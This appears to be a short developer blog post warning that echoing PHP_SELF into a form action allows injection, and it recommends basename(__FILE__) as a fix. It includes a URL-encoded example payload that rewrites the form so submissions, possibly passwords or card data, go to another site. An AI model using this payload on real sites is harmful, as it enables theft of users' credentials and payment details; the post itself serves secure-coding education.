It's pretty common for PHP developers to use $_SERVER['PHP_SELF'] to grab the destination page when using a form action. A common setup could look something like this:

http://example.com/script.php
<form action="<? echo $_SERVER['PHP_SELF']; ?>" method="post">
  ...form elements...
</form>

Now, the problem lies in the fact, you can inject code into the form action very easily by modifying the page URL to something like (line break just to preserve this page!):

http://example.com/script.php/%22%3E%3Cform%3E%3Cform%20
action=%22http://othersite.com/phpscript.php

That causes your form to end up looking like...

<form action="/script.php/"><form>
<form action="http://othersite.com/phpscript.php" method="post">
...form elements...
</form>

Nasty! That would cause the form to submit to a completely different site (and possibly transmit passwords/credit card info. etc).

I was leaving the action blank to get around this, but I've since found that safari has a few issues with blank fields so... one of the best ways to get around this it seems, is to use (instead of PHP_SELF):

basename(__FILE__);